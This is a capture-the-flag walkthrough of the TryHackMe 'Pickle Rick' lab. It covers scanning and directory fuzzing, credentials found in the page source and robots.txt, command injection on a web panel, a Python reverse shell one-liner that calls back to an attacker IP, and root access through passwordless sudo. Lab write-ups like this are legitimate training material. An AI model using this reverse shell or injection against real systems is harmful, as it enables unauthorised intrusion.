root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

image

First we start with an nmap scan

# Nmap 7.92 scan initiated Wed Oct 12 10:43:01 2022 as: nmap -sC -sV -T4 -oN quickmap.txt -Pn 10.10.154.17
Nmap scan report for 10.10.154.17
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 55:7b:41:a6:7d:c5:62:13:c5:c2:af:8c:25:ae:24:b1 (RSA)
|   256 5c:c7:f0:af:79:69:38:f7:b0:94:00:6f:f2:de:5f:ba (ECDSA)
|_  256 e7:1b:43:9d:09:5d:17:e2:98:a9:a8:e7:e8:cf:9d:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 12 10:43:31 2022 -- 1 IP address (1 host up) scanned in 29.40 seconds

Nice we got http and ssh ports open, let’s enumerate port 80. First we open the IP on our browser

image

nice we git the homepage and it’s all about rick burping, asking us to logon to his computer to find the last 3 ingredients for him to change back from a pickle. Let’s check source page

image

cool we got a username: R1ckRul3s, let’s burst hidden directories

┌──(n16hth4wk㉿n16hthawk-sec)-[~/Documents/THM/PickleRick]
└─$ ffuf -u "http://10.10.154.17/FUZZ" -w /usr/share/wordlists/dirb/common.txt -e .txt,.php,.phtml -fc 403 -t 40

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.154.17/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .txt .php .phtml 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________

                        [Status: 200, Size: 1062, Words: 148, Lines: 38, Duration: 196ms]
assets                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 178ms]
denied.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 168ms]
index.html              [Status: 200, Size: 1062, Words: 148, Lines: 38, Duration: 153ms]
login.php               [Status: 200, Size: 882, Words: 89, Lines: 26, Duration: 161ms]
portal.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 168ms]
robots.txt              [Status: 200, Size: 17, Words: 1, Lines: 2, Duration: 158ms]
robots.txt              [Status: 200, Size: 17, Words: 1, Lines: 2, Duration: 167ms]
:: Progress: [18456/18456] :: Job [1/1] :: 250 req/sec :: Duration: [0:01:29] :: Errors: 0 ::

let’s check robots.txt

image

we got a text “Wubbalubbadubdub” 🤔 that might be a potential password, let’s check portal.php

image

we got redirected to a login.php page, why don’t we try login with the username:R1ckRul3s and the potential password:Wubbalubbadubdub

image

great we logged in, let’s try gain shell. on the portal.php we have a command panel, let’s test for command injection

image

great we have a command injection. let’s put our reverse shell payload.

Reverse shell payload ready

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.12.222",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

ncat listner ready

image

let’s inject our payload to the command panel.

image

check our ncat listener, boom we got shell

image

let’s stabilize the shell

image

let’s escalate privs to root. By just trying sudo -l we got to see that User www-data may run (ALL) NOPASSWD: ALL as root without password on the box.

image

We are root!. let’s locate the ingredients

root@ip-10-10-197-162:/var/www/html# cat Sup3rS3cretPickl3Ingred.txt 
[redacted]
root@ip-10-10-197-162:/var/www/html# 
root@ip-10-10-197-162:/var/www/html# 
root@ip-10-10-197-162:/var/www/html# cd /home/rick/
root@ip-10-10-197-162:/home/rick# 
root@ip-10-10-197-162:/home/rick# ls
second ingredients
root@ip-10-10-197-162:/home/rick# cat "second ingredients" 
[redacted]
root@ip-10-10-197-162:/home/rick# 
root@ip-10-10-197-162:/home/rick# cd /root/
root@ip-10-10-197-162:~# 
root@ip-10-10-197-162:~# ls
3rd.txt  snap
root@ip-10-10-197-162:~# cat 3rd.txt 
[redacted]
root@ip-10-10-197-162:~# 
root@ip-10-10-197-162:~#

image

We are done. hope you had fun😉